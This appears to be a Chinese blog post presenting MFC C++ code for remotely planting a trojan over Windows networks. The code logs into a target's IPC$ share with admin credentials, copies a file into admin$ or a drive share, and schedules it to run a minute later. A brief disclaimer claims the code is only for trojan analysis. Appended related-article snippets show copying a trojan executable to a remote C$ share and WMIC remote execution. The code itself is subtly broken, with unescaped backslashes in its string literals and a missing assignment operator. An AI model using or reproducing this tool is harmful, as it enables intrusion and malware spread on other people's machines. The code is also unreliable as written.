要实现代码例如以下:

/////////////////////////////////////////////////////////////////////////////////////

typedef struct TagHost

{

CString host;

CString user;

CString pass;

CString filename;

CString LocalFilePath;

CListBox* list;

}IPC;

void CShareDlg::OnStart() //启动线程序

{

  UpdateData(TRUE);

  IPC* ipc = new IPC;

  ipc->host = m_host;

  ipc->user = m_user;

  ipc->pass = m_pass;

  ipc->LocalFilePath = m_localfile;

  ipc->filename = filename;

  ipc->list = &m_list;

  AfxBeginThread(ThreadIpcConnect,ipc);

}

/////////////////////////////线程/////////////////////////////////////////////////////

UINT ThreadIpcConnect(LPVOID lpvoid)

{

  IPC* ipc;

  CListBox* list;

  ipc = (IPC*)lpvoid;

  CString host;

  CString admin;

  CString pass;

  CString filename;

  CString localfilepath;

  host = ipc->host ;

  pass = ipc->pass;

  admin = ipc->user;

  localfilepath = ipc->LocalFilePath;

  filename =ipc->filename ;

list = ipc->list;

  BOOL IpcConnect;

  LPTIME_OF_DAY_INFO TimeBuf=NULL;

  NET_API_STATUS Status;

  CString RemoteFilePath,CmdCom("admin$\");

///////////////////////////////IPC连接////////////////////////////////////////////////////////////////

  NETRESOURCE ns;

  TCHAR buf[MAX_PATH];

  wsprintf(buf,"\\%s\ipc$",host);

  ZeroMemory(&ns,sizeof(ns));

  ns.dwScope=RESOURCE_GLOBALNET;

  ns.dwType=RESOURCETYPE_ANY;

  ns.dwDisplayType=RESOURCEDISPLAYTYPE_GENERIC;

  ns.dwUsage=RESOURCEUSAGE_CONNECTABLE;

  ns.lpLocalName="";

  ns.lpRemoteName=buf;

  ns.lpProvider=NULL;

  ns.lpComment=NULL;

  CString hhost = host;

  IpcConnect =WNetAddConnection2(&ns,pass,admin,0);

///建立IPC连接

  if(IpcConnect)

  {

//连接成功后

///////////////////////////连接成功上传文件//////////////////////////////////////////////////////////

    RemoteFilePath=("\\"+host+"\admin$\"+filename);

    IpcConnect=CopyFile(localfilepath,RemoteFilePath,FALSE);

//拷贝文件到admin$(winnt) 假设复制失败,。向其它共享区复制

      if(!IpcConnect)

        {

          RemoteFilePath=("\\"+host+"\C$\"+filename);

          CmdCom="C:\"+filename;

          IpcConnect=CopyFile(localfilepath,RemoteFilePath,FALSE);

            if(!IpcConnect)

            {

               RemoteFilePath=("\\"+host+"\D$\"+filename);

               CmdCom="D:\"+filename;

               IpcConnect=CopyFile(localfilepath,RemoteFilePath,FALSE);

           if(!IpcConnect)

                  {

                     RemoteFilePath=("\\"+host+"\E$\"+filename);

                     CmdCom="E:\"+filename;

                     IpcConnect=CopyFile(localfilepath,RemoteFilePath,FALSE);

                     if(!IpcConnect)

                       {

                        RemoteFilePath ("\\"+host+"\F$\"+filename);

                        CmdCom = "F:\"+filename;

                     IpcConnect = CopyFile(localfilepath,RemoteFilePath,FALSE);

                       }

                  }

              }

         }

///////////////////////////得到远程主机时间///////////////////////////////////////////////////////////

         if(IpcConnect)

         {//获取远程主机时间

           Status=NetRemoteTOD(host.AllocSysString(),(LPBYTE *)&TimeBuf);

            if(Status==NERR_Success)

            {//活取时间成功

///////////////////////////启动目标文件///////////////////////////////////////////////////////////////

              DWORD day=1,JobTime;

              AT_INFO ai;

              day=day*2;

              ai.Command=CmdCom.AllocSysString();

              ai.DaysOfMonth=day;

              ai.DaysOfWeek=0;

              ai.Flags=JOB_NONINTERACTIVE;

              ai.JobTime=((TimeBuf->tod_hours+(-TimeBuf->tod_timezone)/60)%24)*60*60*1000+(TimeBuf->tod_mins+1)*60*1000;

              Status=NetScheduleJobAdd(hhost.AllocSysString(),(LPBYTE)&ai,&JobTime);

              //启动上传的文件,一分钟后启动

              if(Status==NERR_Success)

              {

                list->AddString(host+"启动成功");

              }

              else

                list->AddString(host+"启动失败");

              }

          else

            {

             list->AddString(host+"获取时间失败");

            }

         }

         else

         {

          list->AddString(host+"拷贝文件失败");

         }

    }

    else

    list->AddString(host+"连接失败");

return TRUE;

}

 

代码来自于互联网而且这些代码不过为了备份。供分析木马病毒的时候使用

远程IPC种植木马的更多相关文章

  1. IPC$横向渗透代码实现

    思路 IPC$横向渗透的方法,也是病毒常用的扩散方法. 1.建立连接 2.复制文件到共享中C$.D$.E$.F$ 3.获取服务器的时间 3.设定计划任务按时间执行 用到的Windows API 建立网 ...

  2. 一个DDOS木马后门病毒的分析

    http://blog.csdn.net/qq1084283172/article/details/49305827 一.样本信息 文件名称:803c617e665ff7e0318386e24df63 ...

  3. 内网IPC$种马的三种方法

    copy muma.exe \\host\c$\windows\temp\foobar.exe ##IPC拷贝木马文件 WMIC远程运行命令 wmic /node:host /user:adminis ...

  4. 使用shutdown命令实现局域网内远程关机、重启整蛊他人

    用法: shutdown [/i | /l | /s | /r | /g | /a | /p | /h | /e | /o] [/hybrid] [/soft] [/f]    [/m \\compu ...

  5. 域渗透:IPC$ 命名管道

    介绍:IPC$(Internet Process Connection) 是共享 " 命名管道 " 的资源,它是为了让进程间通信而开放的命名管道,通过提供可信任的用户名和口令,连接 ...

  6. linux端口详解

    Linux端口总结如下: 0|无效端口,通常用于分析操作系统 1|传输控制协议端口服务多路开关选择器 2|管理实用程序 3|压缩进程 5|远程作业登录 7|回显 9|丢弃 11|在线用户 13|时间 ...

  7. 小白日记21:kali渗透测试之提权(一)--本地提权

    本地提权 简单地说,本地提权漏洞就是说一个本来非常低权限.受限制的用户,可以提升到系统至高无上的权限.权限提升漏洞通常是一种"辅助"性质的漏洞,当黑客已经通过某种手段进入了目标机器 ...

  8. ASP漏洞+SQL注入的入侵方法

    本文就是想对装上了防火墙的主机,进行入侵攻击的大概思路小结一下. 首先当然是用扫描器对这台服务器(以下简称主机A)进行常规的扫描,得到初步的信息.再用nmap -sS IP -P0 -p 139 ,透 ...

  9. port与大全portClose方法

    在网络技术,port(Port)通常,有两种含义:首先,物理意义port,例,ADSL Modem.枢纽.开关.路由器连接其他网络设备的接口,如RJ-45port.SCport等等.第二个是逻辑意义p ...

随机推荐

  1. Fix "Drives are running out of free space" Error in SharePoint Health Analyzer

    前言 最近帮助用户做健康检查,用户发现事件查看器(EventView)里面有很多错误,有一个就是"Drives are running out of free space",而且每 ...

  2. Material Designer的低版本兼容实现(十二)—— Slider or SeekBar

    Slider,我更喜欢叫他SeekBar,其实是一个东西啦,就是拖动条.5.0的拖动条和4.x上的HOLO风格完全不同,平添了一些精致.此外还加入了数值指示器,让用户在滑动的时候就能知道现在到了什么位 ...

  3. 开源项目PullToRefresh详解(三)——PullToRefreshScrollView

    和前几篇文章一样,这里还是先设置布局文件,然后找到这个控件.只不过这里要简单很多. 1.布局文件 <?xml version="1.0" encoding="utf ...

  4. Kubernetes中Pod的健康检查

    本文介绍 Pod 中容器健康检查相关的内容.配置方法以及实验测试,实验环境为 Kubernetes 1.11,搭建方法参考kubeadm安装kubernetes V1.11.1 集群 0. 什么是 C ...

  5. Vim 常用操作、查找和替换

    这篇文章来详细介绍 Vim 中查找相关的设置和使用方法. 包括查找与替换.查找光标所在词.高亮前景/背景色.切换高亮状态.大小写敏感查找等. 查找 在normal模式下按下/即可进入查找模式,输入要查 ...

  6. ConcurrentHashMap和HashMap的区别

    (1)ConcurrentHashMap对整个桶数组进行了分段,而HashMap则没有 (2)ConcurrentHashMap在每一个分段上都用锁进行保护,从而让锁的粒度更精细一些,并发性能更好,而 ...

  7. QT入门系列(3):控制台输出QString

    方式一:使用qDebug()输出 QString str("liyifeng");qDebug() << str;12输出结果:"liyifeng" ...

  8. 非常精简的Linux线程池实现(一)——使用互斥锁和条件变量

    线程池的含义跟它的名字一样,就是一个由许多线程组成的池子. 有了线程池,在程序中使用多线程变得简单.我们不用再自己去操心线程的创建.撤销.管理问题,有什么要消耗大量CPU时间的任务通通直接扔到线程池里 ...

  9. Libxml2函数及使用方法概述【转】

    https://blog.csdn.net/chengwenyao18/article/details/7176082 一.关于XML: 在开始研究 Libxml2 库之前,先了解一下XML的相关基础 ...

  10. jQuery-append添加元素click无效

    很久没有使用jQuery,做项目的时候遇到一个小问题就是网页加载之后的append的元素是可以执行click事件,网页加载完成之后的,再次append的元素不执行click事件,简单的通过ul模拟一下 ...